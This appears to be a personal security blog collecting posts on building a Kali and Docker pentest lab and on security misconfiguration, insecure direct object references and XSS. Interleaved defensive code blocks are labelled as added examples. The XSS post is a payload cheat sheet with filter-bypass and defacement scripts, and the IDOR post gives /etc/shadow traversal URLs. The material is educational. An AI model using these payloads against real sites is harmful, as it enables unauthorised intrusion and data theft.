Secrets Finally Revealed
Here you will find some secrets that are finally revealed. You will enjoy reading them and learn some facts.
****** WELCOME TO MY BLOG *******
Spread the word so that others get to know.
Pprasoon Nigam (tracetheuntraceable)

Network Pentesting with Metasploitable | Metasploitable Docker installation in Kali Linux (published 2020-07-09)
<div>Hi,</div>
<div><br /></div>
<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/1XOVQ83LV6I" width="320" youtube-src-id="1XOVQ83LV6I"></iframe></div>
<div><br /></div>
<div>Please find the commands and descriptions below:</div>
<div>Installation of Docker in Kali Linux</div>
<div>Search | Pull | Run the Metasploitable2 image</div>
<div>Network pentesting</div>
<div><br /></div>
<div><b><u>Commands:</u></b></div>
<div><br /></div>
<div>Installation of Docker in Kali Linux (fresh installation)</div>
<div><br /></div>
<div>> sudo curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -</div>
<div>> echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list</div>
<div>> sudo apt-get update</div>
<div>> sudo apt-get install docker-ce</div>
<div><br /></div>
<div><u><b>Metasploitable2 (pull the Docker image and run Metasploitable2)</b></u></div>
<div><br /></div>
<div>> sudo docker search metasploitable2</div>
<div>> sudo docker pull tleemcjr/metasploitable2</div>
<div>> sudo docker run -it tleemcjr/metasploitable2</div>
<div><br /></div>
<div><u>Inside the Metasploitable2 container</u></div>
<div>> ifconfig</div>
<div><br /></div>
<div>Happy hacking and learning</div>
<div>Pprasoon</div>
<div>#Docker #Kali #KaliLinux #Metasploitable2 #NetworkPentesting #Basic</div>

Installation of Docker in Kali Linux and Basics (published 2020-07-05)
<div>Today, we will install Docker in Kali Linux (fresh installation), search for a Docker image, pull a Docker image, and run/stop a Docker container.</div>
<div><br /></div>
<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/ySUdJz3fw_U" width="320" youtube-src-id="ySUdJz3fw_U"></iframe></div>
<div><br /></div>
<div>Follow the steps shown in the video; the commands to be used are below.</div>
<div><br /></div>
<div><u><b><font size="5">Installation of Docker in Kali Linux</font></b></u></div>
<div><br /></div>
<div><b><u>Commands:</u></b> <i style="font-family: georgia;">(Here secrets are revealed)</i></div>
<div>Check whether Docker is present</div>
<div># sudo docker --version</div>
<div><br /></div>
<div># sudo curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -</div>
<div># echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list</div>
<div># sudo apt-get update</div>
<div># sudo apt-get install docker-ce (for fresh installation)</div>
<div># sudo systemctl start docker</div>
<div># sudo systemctl enable docker</div>
<div># sudo docker --version</div>
<div><br /></div>
<div>Search for a Docker image</div>
<div># sudo docker search xvwa</div>
<div><br /></div>
<div>Pull a Docker image</div>
<div># sudo docker pull "image name"</div>
<div><br /></div>
<div>List all Docker images installed</div>
<div># sudo docker image ls</div>
<div><br /></div>
<div>Run a Docker image</div>
<div># sudo docker run --name "anyname" -d -P "image name"</div>
<div>example: # sudo docker run --name xvwa -d -P tuxotron/xvwa</div>
<div><br /></div>
<div>To stop a running container by name</div>
<div># sudo docker stop "name"</div>
<div><br /></div>
<div>To list container IDs (all containers, including stopped ones)</div>
<div># sudo docker ps -aq</div>
<div><br /></div>
<div>To stop a container by ID</div>
<div># sudo docker stop "container id"</div>
<div><br /></div>
<div>To remove a container by ID</div>
<div># sudo docker rm "container id"</div>
<div><br /></div>
<div>To remove a Docker image</div>
<div># sudo docker rmi "image name"</div>
<div><br /></div>
<div>Run a Docker image so that it is reachable from outside the Kali Linux VM</div>
<div>Check your IP with the help of ifconfig and publish the port on that address</div>
<div># sudo ifconfig</div>
<div><br /></div>
<div># sudo docker run --name xvwa -d -p (yourip):80:80 tuxotron/xvwa</div>
<div><br /></div>
<div>Happy Hacking !!!!</div>
<div>Pprasoon</div>
<div><br /></div>
<div>#Docker #KaliLinux #DockerInstallation #DockerPullImage #DockerSearchImage</div>

Web Pentesting LAB in KALI LINUX with DOCKER (published 2020-07-05)
<div>Hi | Welcome | <b><u>Web Pentesting in KALI LINUX with DOCKER</u></b> #Pprasoon</div>
<div><br /></div>
<div>Today, we will create a web application pentesting lab on Kali Linux with the help of Docker.</div>
<div><br /></div>
<div><i>The following can be used in VMware Player / Workstation | VirtualBox</i></div>
<div><br /></div>
<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/EN9ekQFHJtk" width="320" youtube-src-id="EN9ekQFHJtk"></iframe></div>
<div><br /></div>
<div>Follow the steps shown in the video; the commands to be used are below.</div>
<div><br /></div>
<div><u>Step 1:</u></div>
<div><b><u><font size="5">Installation of Docker in Kali Linux</font></u></b></div>
<div><b>Commands: </b><i>(Here secrets are revealed)</i></div>
<div>> sudo curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -</div>
<div>> echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list</div>
<div>> sudo apt-get update</div>
<div>> sudo apt-get install docker-ce (for fresh installation)</div>
<div>> sudo systemctl start docker</div>
<div>> sudo systemctl enable docker</div>
<div>> sudo docker --version</div>
<div><br /></div>
<div><u>Step 2:</u></div>
<div><b><u>Installing OWASP Broken Web Applications such as</u></b></div>
<div>bWAPP</div>
<div>WebGoat 7.1</div>
<div>WebGoat 8.0</div>
<div>Damn Vulnerable Web App</div>
<div>Mutillidae II</div>
<div>OWASP Juice Shop</div>
<div>WPScan Vulnerable Wordpress</div>
<div>OpenDNS Security Ninjas</div>
<div>Altoro Mutual</div>
<div><br /></div>
<div><b>Commands: </b><i>(Here secrets are revealed)</i></div>
<div>> su (to change user to root)</div>
<div>> git clone https://github.com/eystsen/pentestlab.git</div>
<div>> cd pentestlab</div>
<div>> ./pentestlab.sh --help</div>
<div>> ./pentestlab.sh list</div>
<div>> ./pentestlab.sh start bwapp</div>
<div><br /></div>
<div>First check the image (the broken web application running with the help of Docker)</div>
<div><b><u>Commands: </u></b><i>(Here secrets are revealed)</i></div>
<div>> sudo docker ps</div>
<div>> Copy the IP & port and paste them into the browser</div>
<div><br /></div>
<div><font size="5"><b>Running the above images in Kali with the help of Docker (second method).</b></font></div>
<div><br /></div>
<div>For accessing the broken web applications outside Kali Linux, on the host machine.</div>
<div><b><u>Commands</u>: </b><i>(Here secrets are revealed)</i></div>
<div>> sudo docker images</div>
<div>> sudo docker run --name bwapp -d -p <yourip>:80:80 raesene/bwapp</div>
<div>> sudo docker ps</div>
<div>To stop any of the above processes</div>
<div>> sudo docker stop "name"</div>
<div><br /></div>
<div>PLEASE STOP YOUR ANTIVIRUS BEFORE CHECKING ON THE HOST (if required)</div>
<div><br /></div>
<div>Configuration of Burp Suite in Firefox to intercept the request and response</div>
<div>> We will install the FoxyProxy add-on</div>
<div><br /></div>
<div>Happy Hacking !!!!</div>
<div>Pprasoon</div>
<div>#docker #kalilinux #Webpentesting #lab #virtualbox</div>
<div><br /></div>

Security Misconfiguration (published 2018-08-12)<div dir="ltr" style="text-align: left;" trbidi="on">
Security Misconfiguration<br />
============================<br />
Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.<br />
<br />
Server configuration problems<br />
=================================<br />
> Unpatched security flaws in the server software<br />
> Server software flaws or misconfiguration that permit directory listing and directory traversal attacks<br />
> Unnecessary default, backup, or sample files, including scripts, applications, configuration files, and web pages<br />
> Improper file and directory permissions<br />
> Unnecessary services enabled, including content management and remote administration<br />
> Default accounts with their default passwords<br />
> Administrative or debugging functions that are enabled or accessible<br />
> Overly informative error messages (more details in the error handling section)<br />
> Misconfigured SSL certificates and encryption settings<br />
> Use of self-signed certificates to achieve authentication and man-in-the-middle protection<br />
> Use of default certificates<br />
> Improper authentication with external systems<br />
<br />
*****************<br />
All about => <a href="http://prasoon-nigam.blogspot.com/2018/08/insecure-direct-object-references.html" target="_blank">Insecure-direct-object-references</a><br />
Critical Vulnerability => <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-attack-and-defense-notes.html" target="_blank">Sql-injection-attack-and-defense-notes</a><br />
******************************************************<br />
<br />
<span style="color: red; font-size: large;">Mitigation </span><br />
==============<br />
** Do security hardening<br />
1) Configuring all security mechanisms<br />
2) Turning off all unused services<br />
3) Setting up roles, permissions, and accounts, including disabling all default accounts or changing their passwords<br />
4) Logging and alerts<br />
5) Monitoring the latest security vulnerabilities published<br />
6) Applying the latest security patches<br />
7) Updating the security configuration guideline<br />
8) Regular vulnerability scanning from both internal and external perspectives<br />
9) Regular internal reviews of the server’s security configuration as compared to your configuration guide<br />
10) Regular status reports to upper management documenting overall security posture<br />
<br />
Security Misconfiguration Cases<br />
===================================<br />
<span style="color: red;">Case 1 :</span><br />
Your application relies on a powerful framework like Struts or Spring. XSS flaws are found in these framework components you rely on. An update is released to fix these flaws but you don’t update your libraries. Until you do, attackers can easily find and exploit these flaws in your app.<br />
<br />
<span style="color: red;">Case 2 :</span><br />
The app server admin console is automatically installed and not removed. Default accounts aren’t changed. An attacker discovers the standard admin pages on your server, logs in with the default passwords, and takes over.<br />
<br />
<span style="color: red;">Case 3 :</span><br />
Directory listing is not disabled on your server. An attacker discovers she can simply list directories to find any file. The attacker finds and downloads all your compiled Java classes, which she reverse engineers to get all your custom code. She then finds a serious access control flaw in your application.<br />
<br />
<span style="color: red;">Case 4 :</span><br />
App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws. Attackers love the extra information error messages provide.<br />
<br />
<br />
<b>Exploitation </b><br />
==============<br />
<span style="color: red;">Exploit 1:</span><br />
We can try out as many options as we can think of. All we need is to find the URL of the config file, and developers tend to follow a naming convention for config files, so it can be any of the names listed below. This is usually done by brute force.<br />
<br />
web.config<br />
config<br />
appname.config<br />
conf<br />
<br />
<span style="color: red;">Exploit 2: </span><br />
Error Handling<br />
<br />
There are quite a few different ways to handle errors in ASP.NET MVC and Web API, whether through error handlers, filters and overrides, as well as granular application of error handling at the action or controller level. But very likely you have experienced those edge cases where some exception has managed to bubble up past your custom control gates unhandled, and you have been shown an error message.<br />
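Case 4 above and Exploit 2 both come down to how an unhandled exception is turned into a response. The WSGI application below is an added example, not code from this post: the same app is built once with the misconfiguration (the traceback is written into the response) and once hardened (the traceback goes to the server log under a reference id, and the client sees only that id). The handler `risky_view`, the `debug` flag and the request driver `call` are hypothetical.

```python
import logging
import traceback
import uuid

log = logging.getLogger("app")


def risky_view(environ):
    """Hypothetical request handler that fails when a parameter is missing."""
    query = environ.get("QUERY_STRING", "")
    if "id=" not in query:
        raise KeyError("missing id parameter")
    return "200 OK", "ok"


def make_app(debug):
    """Build a WSGI app.

    debug=True reproduces the misconfiguration from Case 4: the full
    traceback is written into the HTTP response body.  debug=False is the
    hardened form: the traceback is logged server-side under a random
    reference id and the client only receives that id.
    """
    def app(environ, start_response):
        try:
            status, body = risky_view(environ)
        except Exception:
            ref = uuid.uuid4().hex[:8]
            # Full detail stays server-side, keyed by the reference id so
            # a user report can be matched to the log entry.
            log.error("ref=%s\n%s", ref, traceback.format_exc())
            status = "500 Internal Server Error"
            if debug:
                body = traceback.format_exc()  # leaks paths, code, versions
            else:
                body = "Internal error. Reference: " + ref
        start_response(status, [("Content-Type", "text/plain; charset=utf-8")])
        return [body.encode("utf-8")]
    return app


def call(app, query_string):
    """Drive the app with a constructed GET request; return (status, body)."""
    captured = {}

    def start_response(status, headers):
        captured["status"] = status

    environ = {"REQUEST_METHOD": "GET", "QUERY_STRING": query_string}
    body = b"".join(app(environ, start_response)).decode("utf-8")
    return captured["status"], body


def leaks_trace(body):
    """True if the response body carries Python traceback markers."""
    return "Traceback (most recent call last)" in body or 'File "' in body


if __name__ == "__main__":
    for debug in (True, False):
        status, body = call(make_app(debug), "")
        print("debug=%s %s leaks_trace=%s" % (debug, status, leaks_trace(body)))
```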
<span style="color: red;"><br /></span>
<span style="color: red;">Exploit 3:</span><br />
URL redirection<br />
<br /></div>
Insecure Direct Object References (published 2018-08-12)<div dir="ltr" style="text-align: left;" trbidi="on">
Insecure Direct Object References<br />
========================================<br />
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.<br />
<br />
Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.<br />
<br />
Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object.<br />
<br />
For Example<br />
http://example.com/app/accountInfo?acct=123<br />
<br />
******************<br />
All About Cross Site Scripting => <a href="http://prasoon-nigam.blogspot.com/2018/06/cross-site-scripting-xss-definition.html" target="_blank">Click on me :)</a><br />
Learn about => <a href="https://prasoon-nigam.blogspot.com/2018/08/security-misconfiguration.html" target="_blank">Security-misconfiguration</a><br />
Know about Critical Vulnerability => <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-attack-and-defense-notes.html" target="_blank">SQL Injection Click on me :)</a><br />
***********************************************************<br />
<br />
<b>Mitigation </b><br />
================<br />
1) Avoid exposing your private object references to users whenever possible, such as primary keys or filenames<br />
2) Validate any private object references extensively with an "accept known good" approach<br />
3) Verify authorization to all referenced objects<br />
<br />
<br />
Insecure Direct Object References cases<br />
=========================================<br />
<b><span style="color: red;">Case 1: </span></b><br />
The value of a parameter is used directly to retrieve a database record<br />
http://foo.bar/somepage?invoice=12345<br />
<br />
String query = "SELECT * FROM table WHERE cartID=" + cartID;<br />
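Case 1 shows the query; the Python/SQLite code below is an added example (not from this post) that puts the vulnerable lookup beside a hardened one that parses the reference strictly, binds it as a parameter and scopes the query to the logged-in user (mitigation points 2 and 3), plus a per-session indirect-reference map for mitigation point 1. The table, the users and the invoice numbers are constructed for illustration.

```python
import secrets
import sqlite3


def setup_db():
    """In-memory invoice table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE invoices (id INTEGER PRIMARY KEY, owner TEXT, amount INTEGER)"
    )
    conn.executemany(
        "INSERT INTO invoices VALUES (?, ?, ?)",
        [(12345, "alice", 100), (12346, "bob", 250)],
    )
    return conn


def get_invoice_insecure(conn, invoice_param):
    """Mirrors Case 1: the request parameter is concatenated into the SQL
    and nothing ties the row to the logged-in user, so changing the number
    in the URL returns someone else's invoice."""
    sql = "SELECT id, owner, amount FROM invoices WHERE id=" + str(invoice_param)
    return conn.execute(sql).fetchone()


def get_invoice_secure(conn, current_user, invoice_param):
    """Accept-known-good parsing, a bound parameter, and an ownership
    condition in the same query."""
    try:
        invoice_id = int(invoice_param)
    except (TypeError, ValueError):
        return None
    return conn.execute(
        "SELECT id, owner, amount FROM invoices WHERE id=? AND owner=?",
        (invoice_id, current_user),
    ).fetchone()


class IndirectRefMap:
    """Per-session map from random opaque tokens to real primary keys,
    so the real key never reaches the client."""

    def __init__(self):
        self._tokens = {}

    def expose(self, real_id):
        token = secrets.token_urlsafe(12)
        self._tokens[token] = real_id
        return token

    def resolve(self, token):
        return self._tokens.get(token)


def get_invoice_by_token(conn, current_user, refmap, token):
    """Resolve the token through the caller's own map, then still apply the
    ownership check; an unknown or foreign token resolves to nothing."""
    real_id = refmap.resolve(token)
    if real_id is None:
        return None
    return get_invoice_secure(conn, current_user, real_id)


if __name__ == "__main__":
    db = setup_db()
    # alice asks for bob's invoice by editing the number in the URL
    print("insecure:", get_invoice_insecure(db, "12346"))
    print("secure:  ", get_invoice_secure(db, "alice", "12346"))
    alice_map = IndirectRefMap()
    tok = alice_map.expose(12345)
    print("by token:", get_invoice_by_token(db, "alice", alice_map, tok))
```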
<br />
<b><span style="color: red;">Case 2: </span></b><br />
This sometimes leads to directory traversal or path traversal.<br />
Many file operations are intended to take place within a restricted directory. By using special elements such as ".." and "/" separators, attackers can escape outside of the restricted location to access files or directories that are elsewhere on the system. One of the most common special elements is the "../" sequence, which in most modern operating systems is interpreted as the parent directory of the current location. This is referred to as relative path traversal. Path traversal also covers the use of absolute pathnames such as "/usr/local/bin", which may also be useful in accessing unexpected files. This is referred to as absolute path traversal.<br />
In many programming languages, the injection of a null byte (the 0 or NUL) may allow an attacker to truncate a generated file name to widen the scope of attack. For example, the software may add ".txt" to any pathname, thus limiting the attacker to text files, but a null injection may effectively remove this restriction.<br />
<br />
e.g. ../../../etc/passwd on Linux<br />
<br />
<b>Directory Traversal</b><br />
<br />
Assume a web application allows for a file to be rendered to a user that is stored on the local machine. If the application isn't verifying what files should be accessed, an attacker can request other files on the file system and those will also be displayed.<br />
<br />
For instance, if the attacker notices the URL:<br />
<br />
http://misc-security.com/file.jsp?file=report.txt<br />
The attacker could modify the file parameter using a directory traversal attack. He modifies the URL to:<br />
<br />
http://misc-security.com/file.jsp?file=../../../etc/shadow<br />
Upon doing this the /etc/shadow file is returned and rendered by file.jsp demonstrating the page is susceptible to a directory traversal attack.<br />
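The check that file.jsp is missing is containment of the resolved path inside the allowed directory. The code below is an added example (not from this post) of that check, covering the three techniques described above: relative traversal with "..", absolute pathnames, and null-byte truncation. The report directory, the report.txt file and the `demo` inputs are constructed here.

```python
import os
import tempfile


class TraversalError(ValueError):
    """Raised when a user-supplied name would leave the allowed directory."""


def safe_join(base_dir, user_path):
    """Resolve user_path inside base_dir or raise TraversalError."""
    if "\x00" in user_path:
        raise TraversalError("null byte in file name")
    base = os.path.realpath(base_dir)
    # os.path.join discards base_dir when user_path is absolute, so an
    # absolute path simply fails the containment check below.
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        raise TraversalError("path escapes the report directory")
    return target


def read_report(base_dir, user_path):
    """Serve a file the way file.jsp?file=... would, but only from base_dir."""
    with open(safe_join(base_dir, user_path), "rb") as fh:
        return fh.read()


def demo():
    """Run the inputs from the post against a constructed directory and
    return, per input, either the file content or the exception name."""
    base = tempfile.mkdtemp()
    with open(os.path.join(base, "report.txt"), "w") as fh:
        fh.write("quarterly report")
    inputs = [
        "report.txt",              # the legitimate request
        "../../../etc/shadow",     # relative traversal from the post
        "/etc/shadow",             # absolute path traversal
        "report.txt\x00.jpg",      # null byte to defeat an appended suffix
        "sub/../report.txt",       # normalises back inside base: allowed
    ]
    results = {}
    for name in inputs:
        try:
            results[name] = read_report(base, name).decode()
        except (TraversalError, FileNotFoundError) as exc:
            results[name] = type(exc).__name__
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(repr(name), "->", outcome)
```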
<br />
<br />
Exploitation<br />
===================<br />
IMP => https://www.exploit-db.com/exploits/35203/<br />
Exploiting Insecure Direct Object References, attackers can bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object ( i.e. by modifying the user account)<br />
<br />
<b><span style="color: red;">Exploit 1 :</span></b><br />
If a URL uses an ID parameter in the query string to access a user's information, e.g.<br />
http://foo.bar/somepage?invoice=12345<br />
an attacker can change the ID by guessing it and may be taken to another person's account<br />
<br />
<br />
<b><span style="color: red;">Exploit 2 :</span></b><br />
If a value is used as part of a directory path, e.g.<br />
http://www.website.com/app/home/some=12312<br />
an attacker can change the path, leading to LFI, path traversal or directory traversal<br />
for example<br />
http://www.website.com/app/home/some../../../etc/passwd<br />
<div>
<br /></div>
</div>
Cross Site Scripting (XSS) (published 2018-06-18)<div dir="ltr" style="text-align: left;" trbidi="on">
Cross Site Scripting (XSS)<br />
===============================<br />
Definition => Cross-site Scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.<br />
<br />
The ability to inject code into the generated web page opens up several potential threats. An attacker can use XSS vulnerabilities to steal cookies, hijack accounts, execute ActiveX, execute Flash content, force you to download software, and take action on your hard disk and data.<br />
<br />
If you look more closely at the URL, it might actually exploit a vulnerability in your bank’s Web site, and look something like http://www.website.com/somepage?redirect=<script>alert(‘XSS’)</script>, where the use of the “redirect” parameter has been exploited to carry out the attack.<br />
<br />
**************************<br />
ALL about <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-attack-and-defense-notes.html" target="_blank">SQL Injection and Defence</a><br />
What is <a href="http://prasoon-nigam.blogspot.com/2018/06/sessionall-about-session.html" target="_blank">Session</a><br />
Fun with computers => <a href="http://prasoon-nigam.blogspot.com/2011/06/how-to-make-folder-without-name-hidden.html" target="_blank">make-folder-without-name</a><br />
********************************************************<br />
<br />
There are 3 types of XSS<br />
==================<br />
<span style="color: red;"><u><b>Stored XSS (AKA Persistent or Type I)</b></u></span><br />
<span style="white-space: pre;"> </span>Stored XSS generally occurs when user input is stored on the target server, such as in a database, in a message forum, visitor log, comment field, etc. And then a victim is able to retrieve the stored data from the web application without that data being made safe to render in the browser<br />
<br />
<span style="color: red;"><u><b>Reflected XSS (AKA Non-Persistent or Type II)</b></u></span><br />
<span style="white-space: pre;"> </span>Reflected XSS occurs when user input is immediately returned by a web application in an error message, search result, or any other response that includes some or all of the input provided by the user as part of the request, without that data being made safe to render in the browser, and without permanently storing the user provided data. In some cases, the user-provided data may never even leave the browser<br />
<br />
<span style="color: red;"><u><b>DOM Based XSS (AKA Type-0)</b></u></span><br />
<span style="white-space: pre;"> </span>DOM Based XSS is a form of XSS where the entire tainted data flow from source to sink takes place in the browser, i.e., the source of the data is in the DOM, the sink is also in the DOM, and the data flow never leaves the browser. For example, the source (where malicious data is read) could be the URL of the page (e.g., document.location.href), or it could be an element of the HTML, and the sink is a sensitive method call that causes the execution of the malicious data (e.g., document.write).<br />
<br />
<span style="white-space: pre;"> </span>URL fragments (used to pass something into JavaScript): anything after # (hash) is not sent to the server.<br />
<br />
<br />
<b>Attacks can be done by XSS</b><br />
==========================================<br />
> steal cookies (if they are not httpOnly)<br />
> retrieve the current page that the victim sees (as the victim user)<br />
> get the current URL of the victim<br />
> get the current referrer of the victim<br />
> Redirect to some other website<br />
> use the application cookies to gain access to the victim’s account<br />
> use possible CSRF (cross-site request forgery) vulnerabilities to make the victim perform unwanted actions in the application (e.g. add a new user)<br />
> inject malicious code into victim’s browser in order to exploit browser vulnerabilities<br />
> inject malicious Java applet, etc<br />
<br />
<b>Mitigation</b><br />
===============<br />
> Input validation both client and server side<br />
> Output encoding<br />
> Whitelisting of words<br />
> OWASP ESAPI<br />
<br />
<b>JavaScript functionality</b><br />
==============================<br />
Window object<br />
Window object properties<br />
1) window.location<br />
<script>window.location.href="https://www.google.co.in"</script><br />
<br />
2) document.body.innerHTML<br />
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script><br />
<br />
<br />
<b>XSS Cases</b><br />
===================<br />
<span style="color: red;">Case 1 :</span><br />
When there is no input validation and no output encoding, use a simple payload<br />
<script>alert(9)</script><br />
<svg/onload=alert(9)><br />
“><img src=x onerror=alert(1);><br />
<br />
<span style="color: red;">Case 2 :</span><br />
When the input lands inside a value attribute (value="something">), try putting the payload outside the double quotes<br />
"><script>alert(9)</script><br />
"><svg/onload=alert(9)><br />
<br />
<span style="color: red;">Case 3 :</span><br />
Try injecting the payload into all possible parameters, input boxes, dropdown lists and hidden fields, such as<br />
input boxes<br />
search?q=<br />
value=' '<br />
drop down list value going in a parameter<br />
p=something (Hidden) (intercept with the burp-Suite)<br />
<br />
<span style="color: red;">Case 4 :</span><br />
When an input box limits how many characters can be typed into it, right-click the input box, choose Inspect Element and raise the limit to its maximum (so that you can write your payload)<br />
value = "><svg/onload=alert(9)><br />
<br />
<span style="color: red;">Case 5 :</span><br />
When output encoding is applied inside the value attribute, try building a payload with event handlers such as onmouseover or onmouseclick<br />
Also check exactly which characters are output-encoded and which are escaped<br />
123" onmouseover="alert(9);<br />
asd" onmouseclick="alert(9);<br />
When the server escapes special characters like " or ', the payload can be<br />
123 onmouseover=alert(9);<br />
<br />
<span style="color: red;">Case 6 : </span><br />
A rule of thumb for the href attribute: when any input ends up as a hyperlink, just give it a simple payload<br />
javascript:alert(9)<br />
and you get the alert box<br />
hyperlink payloads<br />
<a href="http:google.com" onclick=javascript:alert(9)> for always a link created<br />
www.google.com" onclick="confirm(9)"> href payload<br />
<br />
<span style="color: red;">Case 7 : </span><br />
When the server removes certain words or characters, try converting those words to base64 to bypass the filter<br />
"><script>eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='));</script><br />
"><script>eval(alert(document.domain))</script><br />
<br />
<span style="color: red;">Case 8 :</span><br />
When the words script, style and on aren't allowed, we have to think of something else. It is possible to encode JavaScript as Base64 and make it execute as an iframe src.<br />
<br />
<iframe src="data:text/html;base64, .... base64 encoded HTML data ...."><br />
<br />
The HTML data we want to use is:<br />
<script>parent.alert(document.domain);</script><br />
<br />
parent. is needed because we want the alert to execute in the context of the parent's window. Encoding it as Base64 with the Character Encoding Calculator results in:<br />
<br />
PHNjcmlwdD5wYXJlbnQuYWxlcnQoZG9jdW1lbnQuZG9tYWluKTs8L3NjcmlwdD4<br />
<br />
The code that we will then put into the search box to finish the level is:<br />
<br />
"><iframe src="data:text/html;base64,PHNjcmlwdD5wYXJlbnQuYWxlcnQoZG9jdW1lbnQuZG9tYWluKTs8L3NjcmlwdD4="></iframe><br />
<br />
<br />
<span style="color: red;">Case 9 : </span><br />
Sometimes playing with HTML tags also leads to XSS.<br />
For example:<br />
closing a textarea and then putting a payload leads to stored XSS<br />
payload:<br />
</textarea><svg/onload=alert(9)><br />
<br />
<span style="color: red;">Case 10 :</span><br />
Sometimes adding a parameter and then a payload leads to reflected XSS<br />
for example<br />
we have a URL http://www.website.com/forgotpassword<br />
change it to<br />
http://www.website.com/forgotpassword?aa=<script>alert(9)</script><br />
<br />
<span style="color: red;">Case 11 :</span><br />
When some input goes inside <script> </script>, we only have to put "-alert(9)-"<br />
and it is vulnerable to XSS<br />
<br />
<span style="color: red;">Case 12 : </span>DOM BASED XSS<br />
For example:<br />
1)<br />
Assume that the URL<br />
http://www.vulnerable.site/welcome.html<br />
<br />
contains the following content:<br />
<HTML><br />
<TITLE>Welcome!</TITLE><br />
Hi<br />
<SCRIPT><br />
var pos=document.URL.indexOf("name=")+5;<br />
document.write(document.URL.substring(pos,document.URL.length));<br />
</SCRIPT><br />
<br />
Welcome to our system<br />
…</HTML><br />
This page will use the value from the "name" parameter in the following manner.<br />
http://www.vulnerable.site/welcome.html?name=Joe<br />
In this example, the JavaScript code embeds part of the document.URL (the page location) into the page, without any consideration for security. An attacker can abuse this by luring the client to click on a link such as<br />
http://www.vulnerable.site/welcome.html?name=<br />
<script>alert(document.cookie)</script><br />
<br />
2)<br />
<script><br />
<br />
var h = document.location.hash.substring(1);<br />
if (h && h != ""){<br />
var re = new RegExp(".+@.+");<br />
if (h.match(re)){<br />
<span style="white-space: pre;"> </span>document.getElementById("email").innerHTML+="("+h+")";<br />
<span style="white-space: pre;"> </span>}<br />
}<br />
</script><br />
payload = <img/src=x onerror=alert(9)>@gmail.com<br />
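Defensive counterpart to the two DOM-based sinks above, as an added example that is not part of the original post. It runs under Node.js without a browser, so the helpers return the HTML string a page would render; the function names and the anchored e-mail regex are this example's own choices.<br />

```javascript
// Added example (not from the original post): handling the two DOM-based XSS
// sinks shown above safely. The vulnerable code writes document.URL and
// location.hash straight into the page with document.write / innerHTML; here
// the untrusted value is validated and HTML-encoded before it reaches any sink.

// Encode the five characters that let text break out of an HTML text node or a
// double-quoted attribute value (the same idea as escaping " to &#34).
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Example 1: the welcome page. Instead of document.URL.substring(...), parse the
// query string properly and encode the value before it is inserted into HTML.
// In a browser the equivalent safe sink is el.textContent = name.
function renderWelcome(urlString) {
  const url = new URL(urlString);
  const name = url.searchParams.get("name");
  if (name === null) return "Hi guest";
  return "Hi " + escapeHtml(name);
}

// Example 2: the e-mail suffix written from location.hash. The original test
// ".+@.+" is unanchored and accepts "<img/src=x onerror=alert(9)>@gmail.com".
// An anchored allow-list (assumed here) rejects anything that isn't a plausible
// address, and the value is still encoded afterwards.
const EMAIL_RE = /^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$/;

function renderEmailSuffix(hash) {
  const h = hash.startsWith("#") ? hash.slice(1) : hash;
  if (!h) return "";
  if (!EMAIL_RE.test(h)) return "";   // untrusted input rejected, nothing rendered
  return "(" + escapeHtml(h) + ")";   // allow-list AND encoding, not one or the other
}
```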
==============<br />
IMP :-<br />
Attribute's value field (with the " character escaped to &#34). Escaping ASCII characters can easily be done through this character encoding calculator: http://ha.ckers.org/xsscalc.html.<br />
============================================================================================================================<br />
<br />
<br />
**************************<br />
ALL about <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-attack-and-defense-notes.html" target="_blank">SQL Injection and Defence</a><br />
What is <a href="http://prasoon-nigam.blogspot.com/2018/06/sessionall-about-session.html" target="_blank">Session</a><br />
Fun with computers => <a href="http://prasoon-nigam.blogspot.com/2011/06/how-to-make-folder-without-name-hidden.html" target="_blank">make-folder-without-name</a><br />
**************************************************<br />
<br />
<b>Exploitation With XSS</b><br />
=========================<br />
IMP => https://www.exploit-db.com/papers/13057/<br />
<span style="white-space: pre;"> </span> https://www.exploit-db.com/docs/15530.pdf<br />
<span style="white-space: pre;"> </span>http://internet.wonderhowto.com/how-to/hack-remote-internet-browser-with-xss-shell-261948/<br />
